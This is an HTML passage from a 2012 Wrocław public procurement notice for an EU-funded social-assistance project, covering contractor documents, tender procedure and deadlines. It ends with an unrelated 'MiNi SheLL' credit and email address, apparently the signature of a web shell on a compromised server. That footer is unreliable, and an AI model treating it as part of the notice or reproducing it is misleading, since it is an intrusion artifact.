<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cis.wroclaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Strzegomska 49, 53-611 Wrocław pokój 3A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2012 godzina 14:00, miejsce: Strzegomska 49, 53-611 Wrocław parter sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Model Wsparcia jako innowacyjne narzędzie wzmacniające współpracę publicznych i niepublicznych instytucji pomocy społecznej oraz przedsiębiorców dedykowane gminnym zespołom interdyscyplinarnym współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com